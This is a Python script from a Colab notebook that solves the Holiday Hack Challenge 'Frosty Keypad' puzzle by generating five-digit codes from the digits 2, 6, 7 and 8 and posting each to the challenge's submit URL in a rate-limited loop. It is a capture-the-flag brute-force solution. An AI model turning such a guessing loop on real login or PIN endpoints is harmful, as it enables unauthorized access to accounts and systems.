"""Frosty Keypad BruteForce.ipynb

Automatically generated by Colab.

Microsoft Co-Pilot Prompts used to generate this code:
-	I'm trying to write a short python script that submits JSON data to a url, but the following gives me an error: curl -X POST -H 'Content-type: application/json' --data '{"answer":"99999"}' https://hhc24-frostykeypad.holidayhackchallenge.com/submit?id=b3b45c24-1b1d-4ae3-9466-8db1cf2512fd
-	I need to generate all the possible five-digit combinations that use all of the digits 2,6,7 and 8 at least once
"""

import requests
import time
from itertools import permutations

url = 'https://hhc24-frostykeypad.holidayhackchallenge.com/submit?id=b3b45c24-1b1d-4ae3-9466-8db1cf2512fd'

def generate_combinations():
    numbers = [2, 2, 6, 6, 7, 7, 8, 8]
    length = 5
    valid_combinations = set()

    for perm in permutations(numbers, length):
        if all(perm.count(num) >= 1 for num in {2, 6, 7, 8}):
            valid_combinations.add(perm)

    return valid_combinations

combinations = generate_combinations()

for comb in combinations:
    data = {"answer": "".join(map(str, comb))}
    print(data)

    response = requests.post(url, json=data, headers={'Content-Type': 'application/json'})
    time.sleep(1.5)

    if response.status_code == 200:
        print("Data submitted successfully!")
        print(f"Data submitted succesfully. Status code: {response.status_code}")


